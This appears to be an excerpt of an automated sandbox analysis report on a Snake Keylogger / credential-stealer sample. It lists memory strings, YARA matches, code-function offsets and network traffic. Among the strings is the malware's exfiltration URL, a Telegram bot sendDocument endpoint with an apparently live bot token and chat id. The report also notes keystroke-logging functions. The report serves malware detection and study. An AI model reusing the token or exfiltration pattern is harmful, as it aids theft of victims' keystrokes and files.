                  Source: UOEAjWmusE.exe, 00000000.00000002.1331909369.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1375618347.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49694 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_013C42180_2_013C4218
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_013CE04C0_2_013CE04C
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_013C70890_2_013C7089
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DD7200_2_053DD720
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DE2500_2_053DE250
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DEDC00_2_053DEDC0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DD7110_2_053DD711
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DF76C0_2_053DF76C
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DE1B20_2_053DE1B2
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DF1F90_2_053DF1F9
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DF2080_2_053DF208
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DED710_2_053DED71
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053DEDB10_2_053DEDB1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053D3DA80_2_053D3DA8
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_053D3D980_2_053D3D98
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B45B00_2_059B45B0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B45C00_2_059B45C0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B35120_2_059B3512
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B35200_2_059B3520
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B37180_2_059B3718
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B370A0_2_059B370A
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B56300_2_059B5630
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B56200_2_059B5620
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B41000_2_059B4100
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B30880_2_059B3088
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B40A80_2_059B40A8
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B40F20_2_059B40F2
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B00070_2_059B0007
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B00400_2_059B0040
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B307A0_2_059B307A
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BD3B00_2_059BD3B0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B32980_2_059B3298
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B32A80_2_059B32A8
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B4D800_2_059B4D80
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B4D700_2_059B4D70
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B3CB80_2_059B3CB8
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B3CAA0_2_059B3CAA
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B2CF00_2_059B2CF0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B5C100_2_059B5C10
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B5C000_2_059B5C00
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BEC380_2_059BEC38
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BEC280_2_059BEC28
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BCF780_2_059BCF78
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B1E380_2_059B1E38
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B1E480_2_059B1E48
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B29F80_2_059B29F8
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B39500_2_059B3950
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B296A0_2_059B296A
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059B39600_2_059B3960
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BE8000_2_059BE800
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BCB320_2_059BCB32
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 0_2_059BCB400_2_059BCB40
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116C1687_2_0116C168
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116A8217_2_0116A821
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116CAB07_2_0116CAB0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_01164F087_2_01164F08
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_01167E687_2_01167E68
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116B9E07_2_0116B9E0
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116CAA27_2_0116CAA2
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_01162DD17_2_01162DD1
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_01167E597_2_01167E59
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_01164EF87_2_01164EF8
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_009F42189_2_009F4218
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_009FE04C9_2_009FE04C
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_009F70899_2_009F7089
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_04A26EA89_2_04A26EA8
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_04A201209_2_04A20120
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_04A201309_2_04A20130
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_04A283D79_2_04A283D7
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_04A26E989_2_04A26E98
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E556309_2_06E55630
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E537189_2_06E53718
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E500409_2_06E50040
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E53CB89_2_06E53CB8
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E54D809_2_06E54D80
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E556209_2_06E55620
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5370B9_2_06E5370B
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E545B09_2_06E545B0
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E535209_2_06E53520
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E535109_2_06E53510
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E532A89_2_06E532A8
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E532989_2_06E53298
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5D3A29_2_06E5D3A2
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E540F39_2_06E540F3
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E530889_2_06E53088
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5307B9_2_06E5307B
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E500119_2_06E50011
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E541009_2_06E54100
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E51E489_2_06E51E48
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E51E389_2_06E51E38
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5CF789_2_06E5CF78
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E52CF09_2_06E52CF0
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E53CAB9_2_06E53CAB
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5EC289_2_06E5EC28
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5EC389_2_06E5EC38
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E55C009_2_06E55C00
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E55C109_2_06E55C10
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E54D709_2_06E54D70
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5CB329_2_06E5CB32
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E5E8009_2_06E5E800
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E529EB9_2_06E529EB
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E529F89_2_06E529F8
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E539609_2_06E53960
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 9_2_06E539509_2_06E53950
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111C16812_2_0111C168
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111A82112_2_0111A821
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111CAB012_2_0111CAB0
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01114F0812_2_01114F08
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01117E6812_2_01117E68
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111C37B12_2_0111C37B
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_011127B912_2_011127B9
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111B9E012_2_0111B9E0
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_0111CAAE12_2_0111CAAE
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01112DDB12_2_01112DDB
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01117E6612_2_01117E66
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeCode function: 12_2_01114EFB12_2_01114EFB
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1336294709.0000000009970000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1333888240.00000000055C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1329759693.000000000108E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000000.1299004426.0000000000952000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegATZ.exe@ vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1331909369.0000000002F9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000007.00000002.3765576766.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exeBinary or memory string: OriginalFilenamegATZ.exe@ vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
